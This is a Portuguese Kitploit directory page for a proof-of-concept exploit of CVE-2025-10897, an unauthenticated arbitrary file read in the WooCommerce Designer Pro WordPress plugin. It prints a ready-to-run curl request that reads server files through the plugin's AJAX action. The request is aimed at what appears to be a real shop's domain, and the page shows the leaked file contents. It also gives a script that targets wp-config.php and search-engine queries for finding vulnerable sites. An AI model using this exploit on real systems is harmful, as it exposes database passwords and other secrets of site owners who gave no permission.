Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/error-inside/cve-2025-10897
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosColeta de InformaçõesSegurança WebTestes de Penetração
GitHuberror-inside/cve-2025-10897

CVE-2025-10897

WooCommerce Designer Pro <= 1.9.28 - Leitura Arbitrária de Arquivos Não Autenticada

Ver Repositório
3há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-10897

Python CVSS License Educational

O WooCommerce é um plugin de e-commerce de código aberto para WordPress que transforma sites em lojas online. O WooCommerce Designer Pro é um plugin para WordPress desenvolvido pela JMA Plugins que permite que clientes projetem e personalizem produtos diretamente em lojas WooCommerce.

IMPORTANTE: WooCommerce e WooCommerce Designer Pro são completamente diferentes.

O WooCommerce Designer Pro suporta a criação de cartões de visita, postais, panfletos, pôsteres, camisetas, adesivos e outros materiais imprimíveis, com recursos como suporte a cores CMYK, geração de PDF e uma interface de design baseada em canvas. O plugin integra-se ao WooCommerce para permitir a personalização de produtos em tempo real antes da compra, sendo adequado para negócios de impressão online e lojas de mercadorias personalizadas.

A CVE-2025-10897 é uma leitura arbitrária de arquivos sem autenticação no WooCommerce Designer Pro até a versão 1.9.28 (CWE-22). Um atacante envia com e uma URL apontando para arquivos do servidor, como ou . O plugin retorna o conteúdo do arquivo na resposta JSON. Isso pode vazar senhas de banco de dados e outros segredos do sem qualquer conta WordPress.

POST /wp-admin/admin-ajax.php
action=wcdp_convert_resource_cmyk
file://
/etc/passwd
wp-config.php
wp-config.php

PoC

REQUISIÇÃO

root@kitploit:~
curl -sk -X POST 'https://www.procolorprints.ca/wp-admin/admin-ajax.php' \
  -H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Accept: */*' \
  -H 'Connection: close' \
  -d 'action=wcdp_convert_resource_cmyk&url=file:///etc/os-release'

RESPOSTA

root@kitploit:~
{"string":"data:image\/jpg;base64,TkFNRT0iQWxtYUxpbnV4IgpWRVJTSU9OPSI5LjggKE9saXZlIEphZ3VhcikiCklEPSJhbG1hbGludXgiCklEX0xJS0U9InJoZWwgY2VudG9zIGZlZG9yYSIKVkVSU0lPTl9JRD0iOS44IgpQTEFURk9STV9JRD0icGxhdGZvcm06ZWw5IgpQUkVUVFlfTkFNRT0iQWxtYUxpbnV4IDkuOCAoT2xpdmUgSmFndWFyKSIKQU5TSV9DT0xPUj0iMDszNCIKTE9HTz0iZmVkb3JhLWxvZ28taWNvbiIKQ1BFX05BTUU9ImNwZTovbzphbG1hbGludXg6YWxtYWxpbnV4Ojk6OmJhc2VvcyIKSE9NRV9VUkw9Imh0dHBzOi8vYWxtYWxpbnV4Lm9yZy8iCkRPQ1VNRU5UQVRJT05fVVJMPSJodHRwczovL3dpa2kuYWxtYWxpbnV4Lm9yZy8iCkJVR19SRVBPUlRfVVJMPSJodHRwczovL2J1Z3MuYWxtYWxpbnV4Lm9yZy8iCgpBTE1BTElOVVhfTUFOVElTQlRfUFJPSkVDVD0iQWxtYUxpbnV4LTkiCkFMTUFMSU5VWF9NQU5USVNCVF9QUk9KRUNUX1ZFUlNJT049IjkuOCIKUkVESEFUX1NVUFBPUlRfUFJPRFVDVD0iQWxtYUxpbnV4IgpSRURIQVRfU1VQUE9SVA==","success":true}

Resposta Decodificada em Base64:

root@kitploit:~
NAME="AlmaLinux"
VERSION="9.8 (Olive Jaguar)"
ID="almalinux"
ID_LIKE="rhel centos fedora"
VERSION_ID="9.8"
PLATFORM_ID="platform:el9"
PRETTY_NAME="AlmaLinux 9.8 (Olive Jaguar)"
ANSI_COLOR="0;34"
LOGO="fedora-logo-icon"
CPE_NAME="cpe:/o:almalinux:almalinux:9::baseos"
HOME_URL="https://almalinux.org/"
DOCUMENTATION_URL="https://wiki.almalinux.org/"
BUG_REPORT_URL="https://bugs.almalinux.org/"

ALMALINUX_MANTISBT_PROJECT="AlmaLinux-9"
ALMALINUX_MANTISBT_PROJECT_VERSION="9.8"
REDHAT_SUPPORT_PRODUCT="AlmaLinux"
REDHAT_SUPPORT_PRODUCT_VERSION="9.8"
SUPPORT_END=2032-06-01

Uso

root@kitploit:~
python CVE-2025-10897-X7.py

NOTA: Nosso script PoC tenta obter o wp-config.php, mas o alvo pode ter o WordPress instalado em um local diferente de /var/www.

Argumentos para pesquisar servidores vulneráveis

  • Zern : body:"wc-designer-pro"
  • Fofa : body="wc-designer-pro"
  • Shodan : http.body:"wc-designer-pro"

Recursos

  • OpenCVE - WooCommerce Designer Pro <= 1.9.28 Leitura Arbitrária de Arquivos Sem Autenticação
  • NIST - Detalhes da CVE-2025-10897
  • Página inicial do WooCommerce
  • WooCommerce Designer Pro - Site oficial dos desenvolvedores
  • WooCommerce Designer Pro - Marketplace oficial
  • Nuclei Template - CVE-2025-10897

Aviso Legal

Este repositório e seu conteúdo são fornecidos estritamente para pesquisa de segurança legítima, testes de penetração autorizados, estudo educacional e fins defensivos. Ao acessar ou usar este material, você reconhece total responsabilidade por garantir que suas atividades estejam em conformidade com todas as leis aplicáveis e que você obteve a autorização adequada antes de testar ou aplicar essas técnicas em qualquer sistema que não possua.

Os autores e mantenedores deste projeto não assumem nenhuma responsabilidade por danos, consequências legais ou uso indevido resultantes da aplicação destas informações. Qualquer uso para acesso não autorizado, atividade maliciosa ou fins ilegais é expressamente proibido e não suportado.

Use com responsabilidade. Permaneça dentro da lei. Teste apenas o que você possui ou para o qual tenha permissão explícita por escrito para testar.

Autores

  • ErrorInside // SCT

Licença

SCT-PL

Baixar ferramenta